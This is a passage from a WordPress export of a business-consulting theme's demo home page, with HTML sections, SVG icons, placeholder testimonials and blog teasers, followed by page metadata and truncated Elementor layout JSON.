						<img width="1920" height="745" src="https://maxbizz.s3.amazonaws.com/images/fservice-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/fservice-3.jpg 1920w, https://maxbizz.s3.amazonaws.com/images/fservice-3-300x116.jpg 300w, https://maxbizz.s3.amazonaws.com/images/fservice-3-1024x397.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/fservice-3-768x298.jpg 768w, https://maxbizz.s3.amazonaws.com/images/fservice-3-1536x596.jpg 1536w, https://maxbizz.s3.amazonaws.com/images/fservice-3-600x233.jpg 600w" sizes="(max-width: 1920px) 100vw, 1920px" />					</figure>
								04
								<h4>Digital Delivery <br>  Platform</h4>
								<p>Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.</p>							
								<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
									Read More
								</a>
					<figure>
						<img width="1920" height="745" src="https://maxbizz.s3.amazonaws.com/images/fservice4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/fservice4.jpg 1920w, https://maxbizz.s3.amazonaws.com/images/fservice4-300x116.jpg 300w, https://maxbizz.s3.amazonaws.com/images/fservice4-1024x397.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/fservice4-768x298.jpg 768w, https://maxbizz.s3.amazonaws.com/images/fservice4-1536x596.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" />					</figure>
										<img width="850" height="742" src="https://maxbizz.s3.amazonaws.com/images/image3-home1.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image3-home1.png 850w, https://maxbizz.s3.amazonaws.com/images/image3-home1-300x262.png 300w, https://maxbizz.s3.amazonaws.com/images/image3-home1-768x670.png 768w" sizes="(max-width: 850px) 100vw, 850px" />											
	        our benefits	        <h3>The Best Way To Start Your  Business Right Now</h3>	    
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>	        
				<h5>Passion for Results</h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5>Quality Services</h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5>Diversity & Inclusion</h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        portfolio	        <h3>Our Latest Case Studies</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">view all</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">
				<img width="1200" height="1200" src="https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-100x100.jpg 100w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 1200px) 100vw, 1200px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">
				<img width="1200" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-1200x600.jpg" alt="" loading="lazy" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        our blog	        <h3>Read Our Latest Insights</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<article id="post-447">
									<a href="http://wpdemo.archiwp.com/maxbizz/category/business/" rel="category tag">business</a>									<a href="http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/blog-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/" rel="bookmark">Contactless Payments’ Time Has Come</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/" rel="bookmark"><time datetime="2020-09-04T09:09:22+00:00">September 4, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/"></a>
					</article>
					<article id="post-430">
									<a href="http://wpdemo.archiwp.com/maxbizz/category/business/" rel="category tag">business</a> <a href="http://wpdemo.archiwp.com/maxbizz/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/" rel="bookmark">The Future of Retail: Asia’s Ecosystems</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/" rel="bookmark"><time datetime="2020-02-24T09:00:43+00:00">February 24, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/"></a>
					</article>
					<article id="post-434">
									<a href="http://wpdemo.archiwp.com/maxbizz/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-2-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/" rel="bookmark">Digital Transformation Roadmap: Enablers</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/" rel="bookmark"><time datetime="2019-08-14T09:02:49+00:00">August 14, 2019</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/"></a>
					</article>
			<a href="http://wpdemo.archiwp.com/maxbizz/blog/">view all</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1023</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:28:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:28:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"39dfd74","elType":"section","settings":[],"elements":[{"id":"ec51567","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7817bd5","elType":"widget","settings":{"revslidertitle":"Slider 1","shortcode":"[rev_slider alias=\"slider-1\" slidertitle=\"Slider 1\"][\/rev_slider]"},"elements":[],"widgetType":"slider_revolution"}],"isInner":false}],"isInner":false},{"id":"135be8a","elType":"section","settings":{"gap":"extended","structure":"30","margin":{"unit":"px","top":"-65","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false},"z_index":1},"elements":[{"id":"c591cec","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"eddcefa","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/graph.svg","id":1405},"library":"svg"},"title":"Advanced Analytic","des":"Growth, focus & analysis.","hover_animation":"float","icon_space":{"unit":"px","size":104,"sizes":[]},"icon_bg_width":{"unit":"px","size":80,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FF85231A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"title_typography_font_weight":"600","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding":{"unit":"px","top":"25","right":"25","bottom":"35","left":"25","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"3424f5c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"03a2033","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/target.svg","id":1404},"library":"svg"},"title":"Corporate Finance","des":"Strategy is the foundation.","hover_animation":"float","icon_space":{"unit":"px","size":104,"sizes":[]},"icon_bg_width":{"unit":"px","size":80,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FF85231A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"title_typography_font_weight":"600","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding":{"unit":"px","top":"25","right":"25","bottom":"35","left":"25","isLinked":false},"_padding_tablet":{"unit":"px","top":"25","right":"18","bottom":"35","left":"25","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"icon_size":{"unit":"px","size":53,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"0dee5bf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"9f55b64","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/profit.svg","id":1403},"library":"svg"},"title":"Business Consultation","des":"Professional skilled team.","hover_animation":"float","icon_space":{"unit":"px","size":104,"sizes":[]},"icon_bg_width":{"unit":"px","size":80,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FF85231A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"25","right":"25","bottom":"35","left":"25","isLinked":false},"_padding_tablet":{"unit":"px","top":"25","right":"21","bottom":"35","left":"25","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 